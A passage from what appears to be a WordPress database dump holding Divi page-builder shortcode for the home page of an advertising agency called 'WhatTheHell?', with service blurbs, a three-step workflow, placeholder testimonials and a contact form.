admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-09 20:52:59','2020-07-09 20:52:59','',134,'https://52.66.212.87/2020/07/09/134-revision-v1/',0,'revision','',0),(309,1,'2020-07-09 20:53:34','2020-07-09 20:53:34','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" 